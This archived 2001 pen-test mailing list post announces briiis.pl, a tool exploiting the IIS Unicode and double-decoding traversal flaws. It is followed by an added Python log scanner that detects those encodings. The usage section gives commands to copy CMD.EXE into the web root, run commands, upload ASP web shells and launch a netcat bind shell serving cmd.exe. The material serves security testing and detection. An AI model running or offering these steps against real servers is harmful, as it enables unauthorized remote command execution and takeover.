Penetration Testing
mailing list archives
RE: iXsecurity.tool.briiis.3.02
From: "Colby Rice" <crice () 180096hotel com>
Date: Wed, 13 Jun 2001 16:18:58 -0500
It should be noted that this Windows 2k (workstation, server, etc...) with
SP2 is exploitable using the '/' decoding vulnerability. (I'm sure this
was noted at some point.) It should also be noted that my test machines
have all the latest patches applied from Microsoft. Anyhow... I would
like to thank the people at iXsecurity (Ian Vitek) for this application,
as it proved a point to a co-worker for me. :>
Cheers
CR
-----Original Message-----
From: ian.vitek () ixsecurity com [mailto:ian.vitek () ixsecurity com]
Sent: Wednesday, June 13, 2001 7:14 AM
To: pen-test () securityfocus com
Cc: Hackers
Subject: iXsecurity.tool.briiis.3.02
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
iXsecurity Security Tool Release
briiis.pl v3.02
================
Tool Description
----------------
Briiis is a tool for testing web servers for "/" encoding
vulnerabilities that allow breaking out of the web root from an
executable directory.
E.g. IIS Unicode and double encoding vulnerabilities.
Special features
----------------
* Tests a lot of common executable directories to see whether
any of them is on the same disk as
C:\WINNT\SYSTEM32\CMD.EXE
Very easy to add even more directories
* Caches the found directory
* SSL support with SSLeay (Unix)
* Easy to use text file upload
* Easy to use / encoding option
* Relative path name program execution
* Virtual host support
When to use briiis
------------------
Briiis should be used to test the IIS unicode or the IIS
superfluous decoding vulnerability. Briiis can also be
used to check for other "/" unicode or "/" decoding
vulnerabilities where the goal is to break out from the
web root from an executable directory to access CMD.EXE.
How to use briiis
-----------------
Test a server for the unicode vulnerability with the
command:
briiis.pl -s server
Test the decoding vulnerability:
briiis.pl -s server -F %255c
Copy CMD.EXE to the web executable directory
(Used for running commands and uploading files)
briiis.pl -s server -x
Run commands
briiis.pl -s server -C "dir /a"
Upload an ASP script to the executable directory
(Like cmdasp.asp and upload.asp)
briiis.pl -s server -u upload.asp
Other options
-------------
The virtual host option, -H, is used when multiple web
servers are bound to same IP and PORT. One case is for
example reverse proxying.
The standard "-s www.server.dom" sets the "Host:" header to:
Host: www.server.dom
If other virtual servers need to be tested, run:
briiis.pl -s www.server.dom -H www.server2.dom
Briiis creates a cache file named "<program_name>.cache".
Delete the cache file if you want to run a new test after
patching the server.
The binary file upload does not work due to lack of
privileges. If you want to test it:
* Copy NC.EXE or something to NC.BIN
* briiis.pl -s server -U NC.BIN -d -l c:\
* There is now a NC.SCR, debug script, in c:\
* With cmdasp.asp run
debug < nc.scr
* Start NC.BIN with cmdasp.asp
c:\nc.bin -l -p 7171 -n -v -e cmd.exe
The binary upload function can only handle small files.
Use upload.asp or TFTP when uploading larger files.
Background and more information
-------------------------------
Unicode vulnerability information:
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
Superfluous Decoding Vulnerability information:
http://www.microsoft.com/technet/security/bulletin/MS01-026.asp
TODO
----
* Graphical interface (Planned Q4 2002)
* Basic Authentication (Planned Q3 2001)
--------------------------------------------------
Ian Vitek, mailto:ian.vitek () ixsecurity com
--------------------------------------------------
iXsecurity (former Infosec) is a Swedish and United
Kingdom based tigerteam that has worked with computer-
related security since 1982 and done technical security
audits (pentests) since 1995.
iXsecurity welcomes all new co-workers in Sweden
and United Kingdom.
--------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0.1
iQA/AwUBOydnKY118uy6FU2iEQJttQCgvv2p/eLwoATBCHJwFGyglqTQg90An1jV
WnyLpKEcIdhaDfeNKALz2rNG
=FhpF
-----END PGP SIGNATURE-----
Briiis.pl
=========
(See attached file: briiis.pl)
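The thread above discusses a tool that exercises the "/" encoding break-out; the defender's side of the same problem is recognising those requests in server logs. The following is an added example, not part of the original post and not code from briiis or iXsecurity: a small Python scanner that canonicalizes each request URI the way a hardened server should (repeated percent-decoding to catch the `%255c` double-encoding case from the post, a lenient UTF-8 pass that mimics the overlong-sequence acceptance behind MS00-078, backslash folding, `..` resolution) and flags requests whose decoded path climbs above the web root. The log format, field order and every sample line are constructed for the example; `%c0%af` is the overlong UTF-8 encoding of `/` that the MS00-078 bulletin concerns.

```python
"""Detection-side counterpart to the '/' encoding traversal class (MS00-078 / MS01-026).

Canonicalizes request URIs from constructed IIS-style log lines and flags the
ones whose decoded path escapes the web root.  Assumption: W3C-extended style
fields in the order date time method uri-stem uri-query status.
"""
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import unquote_to_bytes

# Constructed sample log (not real traffic; field order is an assumption of this example).
SAMPLE_LOG = """\
2001-06-13 12:00:01 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir+/a 200
2001-06-13 12:00:02 GET /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe /c+dir 200
2001-06-13 12:00:03 GET /default.asp - 200
2001-06-13 12:00:04 GET /images/logo%2Epng - 200
2001-06-13 12:00:05 GET /docs/%2e%2e/index.html - 200
"""

LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<method>\S+) (?P<stem>\S+) (?P<query>\S+) (?P<status>\d+)$"
)


def percent_decode_passes(data: bytes, max_passes: int = 3) -> Tuple[bytes, int]:
    """Percent-decode repeatedly until stable; a pass count of 2 or more reveals
    double encoding (%255c -> %5c -> \\), the MS01-026 'superfluous decoding' case."""
    passes = 0
    for _ in range(max_passes):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, passes = decoded, passes + 1
    return data, passes


def decode_lenient_utf8(data: bytes) -> Tuple[str, bool]:
    """Decode UTF-8 the way the vulnerable parser did: accept overlong 2- and 3-byte
    forms (e.g. C0 AF for '/') and report that an overlong form was present."""
    out: List[str] = []
    overlong = False
    i, n = 0, len(data)
    while i < n:
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < n and 0x80 <= data[i + 1] <= 0xBF:
            cp = ((b & 0x1F) << 6) | (data[i + 1] & 0x3F)
            overlong |= cp < 0x80          # 2-byte form for an ASCII code point
            out.append(chr(cp))
            i += 2
        elif 0xE0 <= b <= 0xEF and i + 2 < n and all(0x80 <= x <= 0xBF for x in data[i + 1:i + 3]):
            cp = ((b & 0x0F) << 12) | ((data[i + 1] & 0x3F) << 6) | (data[i + 2] & 0x3F)
            overlong |= cp < 0x800         # 3-byte form for a code point that fits in 2
            out.append(chr(cp))
            i += 3
        else:
            out.append("\ufffd")           # stray byte: replace it and keep scanning
            i += 1
    return "".join(out), overlong


def normalize_path(path: str) -> Tuple[str, bool]:
    """Fold backslashes, resolve '.' and '..', and report whether '..' ever climbed
    above the web root (the condition the tool in the post is looking for)."""
    stack: List[str] = []
    escapes = False
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escapes = True
        else:
            stack.append(seg)
    return "/" + "/".join(stack), escapes


def analyze_uri(stem: str) -> Dict[str, object]:
    """Canonicalize one uri-stem and collect the reasons it looks like a traversal attempt."""
    data, passes = percent_decode_passes(stem.encode("latin-1", "replace"))
    text, overlong = decode_lenient_utf8(data)
    path, escapes = normalize_path(text)
    flags: Set[str] = set()
    if passes >= 2:
        flags.add("double-encoding")
    if overlong:
        flags.add("overlong-utf8")
    if escapes:
        flags.add("root-escape")
    return {"path": path, "flags": flags}


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one record per suspicious request; a 200 status on a flagged line means
    the server answered the traversal instead of rejecting it."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        result = analyze_uri(m["stem"])
        if result["flags"]:
            hits.append({"time": m["time"], "status": int(m["status"]),
                         "path": result["path"], "flags": sorted(result["flags"])})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The two flagged lines are the double-encoded and the overlong-UTF-8 forms of the same `..` climb; the `/docs/%2e%2e/index.html` line decodes to a `..` that stays inside the root and is deliberately left unflagged, which shows why the check is done on the canonical path rather than on the raw string. Any server-side check that runs before this kind of full canonicalization (IIS's original check ran between the two decoding passes) can be bypassed by exactly these encodings, which is the point the tool in the post demonstrates.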